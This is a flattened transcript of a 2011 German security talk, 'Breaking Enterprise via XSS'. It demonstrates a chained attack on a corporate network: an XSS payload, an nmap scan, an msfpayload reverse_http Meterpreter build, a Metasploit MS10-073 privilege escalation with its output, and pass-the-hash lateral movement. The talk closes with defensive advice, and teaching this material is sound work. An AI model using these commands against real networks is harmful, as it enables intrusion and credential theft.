Breaking Enterprise via XSS

Transkript

1 Michael Messner Senior IT-Security Consultant Fulda, November 2011 Breaking Enterprise via XSS

2 Agenda Client Sides Was ist Cross Site Scripting (XSS)? Live Demo XSSF Pivoting Privilege Escalation Wir greifen das interne Netzwerk über das Internet an und übernehmen dieses Wie können wir uns verteidigen?

3 Client Sides Client Side Exploits sind gezielte und typischerweise auf die Zielumgebung optimierte Angriffe: Diese Angriffe zielen auf eine bestimmte Organisation / Unternehmen / Personen ab Zielen typischerweise auf eine spezielle Software oder IT Infrastruktur ab In dieser Software wird eine Schwachstelle gesucht, wodurch es für diesen Angriff keine Abwehrmaßnahmen gibt -> 0day Stolen from fancy (bt day 2010) ;)

4 Metasploit und Client Sides ls /opt/framework- 4.1/msf3/modules/exploits/*/fileformat/ -l grep.rb$ wc -l 99 Fileformat Module ls /opt/framework- 4.1/msf3/modules/exploits/*/browser/ -l grep.rb$ wc -l 163 Browser Exploits

5 Metasploit und Client Sides Client Sides rocking ;) auxiliary/server/browser_autopwn auxiliary/server/file_autopwn HTTP Client Automatic Exploiter File Format Exploit Generator Einzelne Module werden jetzt nicht dargestellt jeder kann diese eigenständig testen Wir gehen gleich einen Schritt weiter

6 XSS

7 OWASP Top 10 A2: Cross-Site-Scripting (XSS) XSS Schwachstellen treten immer dann auf, wenn eine Anwendung nicht vertrauenswürdige Daten entgegennimmt, und diese ohne entsprechende Validierung oder Escaping an den Browser des Benutzers übergibt. XSS ermöglicht es einem Angreifer Scripte im Browser des Benutzers auszuführen, welche die Benutzersitzung übernehmen können, Website Defacements durchführen können, oder den Benutzer zu einer vom Angreifer kontrollierten Website mit weiteren schädlichen Inhalten umleiten können. Ausnutzbarkeit: Verbreitung: Erkennung: Techn. Schaden: Durchschnittlich Sehr häufig Leicht Mittel bis Hoch

8 Schwachstellenverteilung The statistics includes data about sites with detected vulnerabilities.

9 Cross Site Scripting Und am Anfang war das Popup <script>alert(xxxx)</script>

10 Cross Site Scripting c) Code wird in Webseite eingebaut Hacker findet XSS Schwachstelle b) Code geht an Webserver Webserver d) Webseite und Code wird an Webbrowser zurückgeschickt und dort ausgeführt Hacker a) Link & Code Benutzer

11 XSS - Potential Angriffspotential Cookie auslesen Temporäre Veränderung der Webseite Einbinden von JavaScript Schadcode von fremden Webservern nachladen Sind Angriffe auf das interne Netzwerk möglich?

12 Demo Hacking Enterprise via XSS Ein gezielter Angriff auf die interne Systemumgebung

13 Hacking Enterprise via XSS Die Umgebung: Ein gesichertes Unternehmensnetzwerk AV-Software IDS/IPS-System Netzwerksegmentierung Aktualisierte Windows Umgebung Der Angriff scheitert ;)

14 Hacking Enterprise via XSS nmap -v -ss -A -p Starting Nmap 5.35DC1 ( ) at :46 CEST Scanning firewall( ) [65536 ports] Completed SYN Stealth Scan at 12:48, s elapsed (65536 total ports) Initiating Service scan at 12:48 Initiating OS detection (try #1) against firewall( ) NSE: Script scanning Nmap scan report for firewall( ) Host is up ( s latency). Not shown: filtered ports PORT STATE SERVICE VERSION 113/tcp closed auth MAC Address: 00:0C:29:97:C4:29 (VMware) Too many fingerprints match this host to give specific OS details

15 Hacking Enterprise via XSS Der kreative Angriff Eine XSS-Schwachstelle im Internetauftritt des Unternehmens wird genutzt Mitarbeiter vertrauen dieser Webseite Dynamischer Angriff auf das Clientsystem Interaktiver Zugriff auf das System des Mitarbeiters Weitere Angriffe auf das interne Netzwerk

16 Hacking Enterprise via XSS Verleiten des Opfers den Link aufzurufen Das Opfer ruft den Link auf Erkennen einer XSS Schwachstelle

17 Hacking Enterprise via XSS Persistenter Zugang in das interne Netzwerk wird aufgebaut Die Webseite mit dem Schadcode wird ausgeliefert Schadcode wird im Browser des Opfers ausgeführt

18 Outgoing Filter Reverse HTTP(S) Payload ist Proxyfähig: msfpayload windows/meterpreter/reverse_http LHOST= LPORT=8080 X > proxy-reverse-payload.exe [*] Meterpreter session 1 opened ( :443 -> :2469) Unser Proxy ;)

19 Pivoting Wir wollen den Pentest/Angriff möglichst effektiv auf das neue Netzwerksegment (das interne Netzwerk) ausdehnen!

20 Hacking Enterprise via XSS

21 Privilege Escalation Erlangte Berechtigungen sollen erweitert werden Von nicht privilegierten Benutzern zu privilegierten Benutzern Lokaler Bob -> Administrator/SYSTEM Domain\User -> Administrator/System Von lokalen Benutzern zu Domain-Benutzern Lokaler System User -> Domain\User Lokaler System User -> Domain\Administrator

22 Priv Escalation Stuxnet MS10-073

23 Priv Escalation Stuxnet MS meterpreter > getuid Server username: AURORA\bob meterpreter > sysinfo Computer : AURORA OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_us Meterpreter : x86/win32 meterpreter > run post/windows/escalate/ms10_073_kbdlayout

24 Priv Escalation Stuxnet MS [*] Attempting to elevate PID 0x384 [*] {"GetLastError"=>0, "return"=>424} [*] Wrote malicious keyboard layout to C:\DOCUME~1\bob\LOCALS~1\Temp\p0wns.boom.. [*] Allocated 0x8000 bytes of 0x [*] Initialized RWX buffer... [*] Current Keyboard Layout: 0x [*] Patched in syscall 0x [*] Successfully executed syscall wrapper! [*] Attempting to cause the ring0 payload to execute... [*] SendInput: {"GetLastError"=>5, "return"=>1} meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

25 Hacking Enterprise via XSS Aktuelle Situation nach Hashdump Administrative Berechtigungen wurden erlangt Passwort Hash lässt sich auslesen Klartext Passwort lässt sich nicht ermitteln Endstation

26 Hacking Enterprise via XSS Pass the Hash SMB nutzt keine Klartext Passwörter sondern Hashes Code Ausführung über Filesharing Dienst möglich Seit 1997 bekannt Windows Passwörter müssen nicht mehr gebrochen werden Kein Bug -> Feature

27 Hacking Enterprise via XSS Wir übernehmen nicht nur ein System Wir übernehmen alle Systeme (mit dem selben Passwort Hash)

28 Zusammenfassung Angreifer aus dem Internet Erfolgreicher Angriff auf interne Umgebung Angriffsvektor: Webapplikation mit XSS Schwachstelle Typisches Benutzerverhalten Evtl. weitere Schwachstellen Art des Angriffs: Zielgerichtet und auf die Umgebung optimiert Komplexität: Mittel bis Hoch

29 Was können wir dagegen tun? Wir haben die Tools wir müssen diese auch nutzen! Externe und interne Penetration Tests Simulation von Angriffen Ermitteln der tatsächlich vorhandenen Angriffspunkte IT-Security im Sicherheitsprozess verankern Ganzheitlichen Sicherheitsansatz verfolgen Training der eigenen Mitarbeiter

30 Questions? Contact: